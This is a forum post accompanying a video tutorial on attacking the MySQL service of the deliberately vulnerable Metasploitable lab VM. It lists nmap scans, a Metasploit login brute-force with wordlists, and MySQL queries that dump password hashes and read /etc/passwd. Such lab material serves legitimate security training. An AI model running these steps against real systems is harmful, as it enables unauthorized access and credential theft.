Results 1 to 5 of 5

Thread: [Video] Metasploitable - MySQL

Threaded View

  1. #1
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Lightbulb [Video] Metasploitable - MySQL

    Links
    Watch video on-line: http://g0tmi1k.blip.tv/file/3826084
    Download
    video: http://www.mediafire.com/?cyz2gr42p49rkzm
    Download usernames.lst: http://www.mediafire.com/?j02jnj3gnx5
    Download passwords.lst: http://www.mediafire.com/?z5imdtojgnw


    What is this?
    This video demonstrates an attack on the MySQL database service on the metasploitable hackable box.

    "Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql." - blog.metasploit.com


    What is this?
    This video demonstrates an attack on the MySQL database service on the metasploitable hackable box.

    "Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql." - blog.metasploit.com


    Guide
    > Use Nmap to scan the network (gathering information)
    > Use Nmap to do a more detailed scan of the target (gathering information)
    > Use Metasploit to brute force the login (gaining access)
    > By using MySQL client we are able to send commands to the database (Discover password hashes and reading files)


    What do I need?

    > Nmap --- on Backtrack 4 (Final)
    > Metasploit --- on Backtrack 4 (Final)
    > MySQL --- on Backtrack 4 (Final) > Dictionaries/Word-lists --- Usernames Passwords
    > Metasploitable.vmdk (SHA-1: 7DF98130DAC3167690209716EBF86047C6B9672F)
    > Metasploitable.part01.rar ~ http://www.mediafire.com/?dy2jl2wmw5h (SHA-1: 76388A5648ADAAAE9E5841AB5B0F660777A28E36)
    > Metasploitable.part02.rar ~ http://www.mediafire.com/?3zrz2wjmjmz (SHA-1: 48B9807812CE7561C5F86667630B9E40D3DD85FA)
    > Metasploitable.part03.rar ~ http://www.mediafire.com/?nmjmyimmqwm (SHA-1: EAAA89F4A24F3B37C27ACECD8580CE95EC39BA34)
    > Metasploitable.part04.rar ~ http://www.mediafire.com/?gdjyzfjyjzm (SHA-1: FB1CDD02115F43AC53FDDA9499F1ED8ED2BF5EE2)

    Commands:

    Code:
    nmap 192.168.1.1-255
    nmap -sS -sV -O -f -n 192.168.1.105
    msfconsole
    search mysql
    use scanner/mysql/mysql_login
    show options 
    set RHOSTS 192.168.1.105
    set USER_FILE /root/usernames.lst
    set PASS_FILE /root/passwords.lst
    exploit
    mysql -h 192.168.1.105 -u root -p
    root
    show databases;
    use mysql
    show tables;
    select User, Password, from user;
    select load_file('/etc/passwd');



    Notes:

    Song: Roberto Sol and Chris le Blanc; Ines - Sueno Damor
    Video length: 3:24
    Capture length: 9:14

    Blog Post: http://g0tmi1k.blogspot.com/2010/07/video-metasploitable-mysql.html
    Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/30076-%5Bvideo%5D-metasploitable-mysql.html#post167040
    Last edited by g0tmi1k; 03-05-2011 at 02:09 PM.
    Have you...g0tmi1k?

Similar Threads

  1. Owning Metasploitable with Backtrack
    By sickness in forum BackTrack Videos
    Replies: 17
    Last Post: 11-02-2010, 02:12 PM
  2. [Video] Metasploitable - PostgreSQL
    By g0tmi1k in forum BackTrack Videos
    Replies: 0
    Last Post: 07-01-2010, 01:22 PM
  3. Metasploitable
    By thorin in forum Beginners Forum
    Replies: 1
    Last Post: 05-25-2010, 07:07 PM
  4. Mysql configure fix
    By galeran in forum OLD BackTrack 4 Software Related Issues
    Replies: 0
    Last Post: 12-23-2009, 03:43 PM
  5. Sun buy MySQL
    By Re@lity in forum OLD General IT Discussion
    Replies: 4
    Last Post: 01-18-2008, 04:26 PM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •